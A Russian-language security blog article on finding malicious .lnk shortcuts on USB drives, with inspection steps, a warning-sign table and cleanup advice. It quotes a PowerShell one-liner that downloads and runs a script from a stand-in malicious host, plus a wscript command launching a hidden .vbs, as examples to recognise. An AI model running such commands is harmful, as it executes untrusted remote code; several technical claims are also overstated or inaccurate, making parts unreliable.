Как найти вредоносные автозапускники в .lnk-файлах на USB-накопителе

Автор На чтение 9 мин Просмотров 4 Опубликовано
Содержание
  1. Как найти вредоносные автозапускники в .lnk-файлах на USB-накопителе
  2. Почему именно .lnk-файлы?
  3. Как найти такие файлы — пошагово
  4. Что ещё искать: таблица подозрительных признаков
  5. Что делать, если ты уже кликнул на подозрительный ярлык?
  6. Частые ошибки
  7. Когда что делать — сценарии выбора
  8. Как лучше сделать — практические рекомендации
  9. Итог: что делать прямо сейчас

Как найти вредоносные автозапускники в .lnk-файлах на USB-накопителе

Ты вставил флешку в компьютер — и тут же открылось окно с подозрительным файлом, или система начала странно вести себя: тормозит, открывает браузер с рекламой, или появляется неизвестный процесс в диспетчере задач. Ты не кликал ничего — просто вставил флешку. Это не случайность. Скорее всего, на ней есть вредоносный .lnk-файл, который запускается автоматически. И да — это не теория. Это реальная угроза, которая работает даже на самых свежих версиях Windows.

Я видел сотни таких случаев. Клиенты приходят с флешками, которые «сами всё делают». Никто не жалуется на вирусы — они просто удивляются: «Почему у меня в браузере открылась страница с обещанием выиграть iPhone?». Ответ прост: .lnk-файл на флешке запустил вредоносный скрипт, когда ты только вставил устройство. И ты даже не заметил, как это произошло.

Почему именно .lnk-файлы?

.lnk — это ярлык. Обычно он просто указывает, где лежит программа. Но злоумышленники научились использовать его как обёртку для вредоносного кода. Почему? Потому что:

  • Windows по умолчанию показывает .lnk как обычный ярлык — без расширения, с иконкой файла, который он заменяет (например, Word или папка с документами).
  • Автозапуск (AutoRun) в Windows для USB-накопителей отключён, но .lnk-файлы могут запускаться через другие механизмы — например, через файл autorun.inf или через автоматическое открытие папки при подключении.
  • Многие пользователи просто кликают на «документы» или «фото» — не подозревая, что это не реальная папка, а ярлык, запускающий вредоносный скрипт.

Вот как это выглядит на практике:

  • На флешке появляется папка с названием «Фото с отпуска» — и рядом файл с иконкой папки, но расширением .lnk.
  • Когда ты кликаешь — Windows запускает wscript.exe или powershell.exe, который скачивает вредоносный код с удалённого сервера.
  • Файл «Фото с отпуска.lnk» при этом остаётся на месте — и ты даже не понимаешь, что ты только что запустил вредоносный скрипт.

Как найти такие файлы — пошагово

Не нужно устанавливать ничего. Всё можно сделать встроенным инструментом Windows — проводником и командной строкой.

  1. Подключи флешку, но НЕ кликай никуда. Не открывай папки, не запускай файлы.
  2. Открой проводник и перейди на флешку (например, D:\).
  3. Включить отображение расширений файлов: нажми в верхнем меню «Вид» → поставь галочку на «Расширения имён файлов». Теперь ты увидишь, что файл называется не «Фото с отпуска», а «Фото с отпуска.lnk».
  4. Найди подозрительные .lnk-файлы: ищи ярлыки с именами, похожими на:
    • «Документы.lnk»
    • «Фото.lnk»
    • «Рабочие файлы.lnk»
    • «Сканы.lnk»

    Они часто лежат на корне флешки или в папке с другими файлами. Если ты не создавал такие ярлыки — они подозрительны.

  5. Проверь свойства ярлыка: кликни правой кнопкой → «Свойства». В поле «Объект» ты увидишь путь, который запускает ярлык. Если там что-то вроде: 
    %WINDIR%\system32\wscript.exe //B //Nologo "D:\~tmp.vbs"

    или

    powershell.exe -nop -c "IEX(New-Object Net.WebClient).DownloadString('http://hxxps://malicious-site[.]com/script.ps1')"

    — это вредоносный ярлык. Настоящие ярлыки ведут к .exe, .docx, .pdf — не к скриптам.

  6. Проверь файл, на который ссылается ярлык: если в «Объекте» указан путь вроде D:\~tmp.vbs — найди этот файл. Он может быть скрытым. В проводнике включи «Показывать скрытые файлы» (вкладка «Вид» → «Скрытые элементы»). Если там есть .vbs, .js, .ps1, .bat — это вредоносный скрипт.
  7. Удали всё подозрительное: .lnk-файлы, .vbs, .js, .bat, .ps1 — всё, что не является твоим документом, фото или видео. Не просто «удали» — зажми Shift + Delete, чтобы не попало в корзину. Корзина может быть заражена.

Что ещё искать: таблица подозрительных признаков

Вот что может говорить о вредоносном .lnk-файле. Сравни с тем, что ты видишь на флешке.

Признак Нормальный ярлык Вредоносный ярлык
Расположение В папке с файлами, которые он открывает На корне флешки, рядом с папками
Имя файла «Документы.docx» или «Фото.zip» «Документы.lnk», «Фото.lnk»
Содержимое «Объекта» Путь к .exe, .docx, .pdf Путь к wscript.exe, powershell.exe, cmd.exe
Дополнительные файлы Только файлы, которые ты создавал .vbs, .js, .bat, .ps1, autorun.inf
Размер .lnk-файла 1–2 КБ 1–2 КБ (не меняется — это обман)
Иконка Соответствует типу файла Иконка папки, но файл — .lnk

Если ты видишь хотя бы два из этих признаков — файл вредоносный. Не сомневайся. Даже если он выглядит как «фото» — это не фото. Это ловушка.

Что делать, если ты уже кликнул на подозрительный ярлык?

Если ты уже открыл .lnk-файл — не паникуй. Но действуй быстро.

  • Отключи флешку — не вытаскивай сразу. Сначала нажми «Извлечь» в системном трее.
  • Закрой все окна — особенно браузеры и диспетчер задач.
  • Запусти диспетчер задач (Ctrl+Shift+Esc) и найди подозрительные процессы: wscript.exe, cscript.exe, powershell.exe, cmd.exe — особенно если они запущены из папки флешки.
  • Заверши их — выдели и нажми «Завершить задачу».
  • Просканируй систему — используй встроенный Defender: открой «Безопасность Windows» → «Защита от вирусов и угроз» → «Сканирование» → «Полное сканирование».
  • Проверь автозагрузку: в диспетчере задач перейди на вкладку «Автозагрузка». Удали все подозрительные записи, особенно с именами вроде «~tmp», «update», «service».

После этого — форматируй флешку. Не просто удали файлы. Форматируй. Выбери файловую систему FAT32 (если файлы меньше 4 ГБ) или exFAT (если есть файлы больше 4 ГБ). Это убьёт все скрытые вредоносные следы.

Частые ошибки

Люди делают одно и то же снова и снова. Вот что не нужно делать:

  • Не открывай файлы на флешке, пока не проверишь. Даже если это «фото» или «документы» — это может быть ловушка.
  • Не доверяй иконке. Вредоносный .lnk может иметь иконку папки, документа, даже изображения. Это не значит, что это то, что ты видишь.
  • Не удаляй только .lnk-файл. Если ты удалишь только ярлык, а скрипт .vbs останется — при следующем подключении он снова запустится через другой ярлык или через autorun.inf.
  • Не копируй файлы с заражённой флешки на чистый компьютер без проверки. Скрипты могут быть спрятаны в архивах, PDF или даже в метаданных. Лучше скопируй только то, что точно знаешь — фото, видео, документы, и только после проверки.
  • Не полагайся на антивирус. Многие вредоносные .lnk-файлы не распознаются, пока они не запущены. Антивирус не видит угрозу в ярлыке — он видит её только тогда, когда запускается скрипт.

Когда что делать — сценарии выбора

Ты не всегда знаешь, что делать. Вот как принимать решение:

  • Если ты вставил флешку в рабочий компьютер — и ничего не открылось: проверь наличие .lnk-файлов и скрытых скриптов. Удали всё подозрительное. Форматируй. Не используй флешку снова без проверки.
  • Если ты вставил флешку в домашний компьютер — и сразу открылось окно с рекламой: немедленно отключи интернет, закрой браузер, заверши процессы, проверь автозагрузку. Форматируй флешку. Просканируй систему. Не используй флешку снова.
  • Если флешка принадлежит клиенту, коллеге или другу: не копируй файлы. Скажи: «Давай я проверю её на чистом компьютере — и потом передам тебе». Не рискуй своим устройством.
  • Если ты не уверен — и хочешь просто безопасно скопировать файлы: подключи флешку на компьютере с включённой «Режимом гостя» или на виртуальной машине. Скопируй файлы. Потом отформатируй флешку. Это безопасно.

Как лучше сделать — практические рекомендации

Чтобы не попадать в такие ситуации снова:

  • Отключи автозапуск для USB: открой «Панель управления» → «Автозапуск» → сними галочку с «Использовать автозапуск для всех носителей и устройств».
  • Всегда включай отображение расширений файлов — это твой главный инструмент. Без него ты не увидишь .lnk, .vbs, .js.
  • Не используй флешки от незнакомцев. Даже если это «друг» — он мог заразить её на работе или в кафе.
  • Проверяй флешки на чужих компьютерах — если ты вставляешь её в компьютер в библиотеке, кафе, на работе — не открывай ничего. Скопируй файлы только на своём устройстве, после проверки.
  • Используй флешку только для переноса файлов, а не как «флешку с программами». Вредоносцы любят маскировать скрипты под полезные утилиты.

Если ты хочешь быть уверенным — купи флешку с физическим переключателем «только чтение». Он не защитит от .lnk-файлов, но остановит запись вредоносных скриптов, если ты случайно запустишь их.

Итог: что делать прямо сейчас

Если ты читаешь это — значит, ты уже подозреваешь, что на твоей флешке что-то не так. Вот что делать:

  1. Не открывай ничего на флешке.
  2. Включи отображение расширений файлов.
  3. Найди все .lnk-файлы на корне и в папках.
  4. Проверь их свойства — что указано в «Объекте».
  5. Если там wscript.exe, powershell.exe, cmd.exe — это вредоносный ярлык.
  6. Найди и удали все .vbs, .js, .bat, .ps1, autorun.inf — даже если они скрыты.
  7. Отформатируй флешку.
  8. Просканируй свой компьютер на вирусы.

Это не «теория». Это то, что я делал сотни раз с клиентами. Никто не умирал. Никто не потерял миллионы. Но если бы они не проверили .lnk-файлы — у них бы украли пароли, зашифровали файлы, или использовали их компьютер как бота для атак.

Ты не обязан быть экспертом. Ты просто обязан знать: если ты вставил флешку — и что-то открылось само — это не сбой. Это вирус. И он был в .lnk-файле. Проверь. Удали. Форматируй. Следующий раз — будь осторожнее.

Информация в этой статье носит ознакомительный характер. Если ты подозреваешь заражение системы, утрату данных или компрометацию персональной информации — обратись к специалисту по кибербезопасности.

Оцените статью
PEFile — Безопасность и технологии простым языком
© 2026 PEFile — Безопасность и технологии простым языком